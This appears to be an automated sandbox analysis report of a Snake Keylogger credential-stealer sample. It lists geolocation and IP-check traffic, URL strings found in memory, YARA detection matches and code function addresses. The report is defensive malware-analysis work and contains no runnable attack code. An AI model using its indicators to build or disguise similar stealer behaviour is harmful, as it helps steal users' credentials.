              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000342D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000327E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: file.exe, 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, aVmZDnwW.exe, 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: file.exe, aVmZDnwW.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
              Source: file.exe, aVmZDnwW.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
              Source: file.exe, aVmZDnwW.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003402000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: file.exe, 00000000.00000002.2185937260.0000000002D76000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, aVmZDnwW.exe, 00000008.00000002.2229755626.00000000028B9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000342D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: file.exe, 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, aVmZDnwW.exe, 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000328A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: RegSvcs.exe, 00000007.00000002.2269652870.000000000347D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.0000000003498000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000342D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.000000000348B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2269652870.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003346000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.000000000331D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003373000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2314110382.0000000003382000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: file.exe, aVmZDnwW.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E07F4 NtQueryInformationProcess,0_2_028E07F4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E9B68 NtQueryInformationProcess,0_2_028E9B68
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E007F4 NtQueryInformationProcess,8_2_00E007F4
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E09B68 NtQueryInformationProcess,8_2_00E09B68
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E13D00_2_028E13D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E83790_2_028E8379
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028EA0B20_2_028EA0B2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E08780_2_028E0878
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E26980_2_028E2698
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E1C600_2_028E1C60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E35A80_2_028E35A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E92A50_2_028E92A5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E92D00_2_028E92D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E5B900_2_028E5B90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E5BA00_2_028E5BA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E53080_2_028E5308
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E13320_2_028E1332
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E50000_2_028E5000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E21180_2_028E2118
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E59190_2_028E5919
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E59280_2_028E5928
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E56A80_2_028E56A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E16A70_2_028E16A7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E56B80_2_028E56B8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E4FF00_2_028E4FF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E44990_2_028E4499
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E44A80_2_028E44A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E34ED0_2_028E34ED
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E8C290_2_028E8C29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E8C700_2_028E8C70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_028E5DAA0_2_028E5DAA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029AA5980_2_029AA598
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029AA5A80_2_029AA5A8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_029A85EC0_2_029A85EC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0994A0F00_2_0994A0F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09941CD00_2_09941CD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09941CC00_2_09941CC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0998C3900_2_0998C390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_099851980_2_09985198
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_099849280_2_09984928
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09986DD00_2_09986DD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09986DC00_2_09986DC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_09984D600_2_09984D60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_099864380_2_09986438
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_099864280_2_09986428
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0A9EE80_2_0A0A9EE8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0A91800_2_0A0A9180
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0A6B170_2_0A0A6B17
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0A6B280_2_0A0A6B28
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0ADE680_2_0A0ADE68
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0A4DD00_2_0A0A4DD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0A4DE00_2_0A0A4DE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0A70C90_2_0A0A70C9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0A0A70D80_2_0A0A70D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0319B3287_2_0319B328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031961087_2_03196108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0319C1907_2_0319C190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031967307_2_03196730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0319C7517_2_0319C751
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0319C4707_2_0319C470
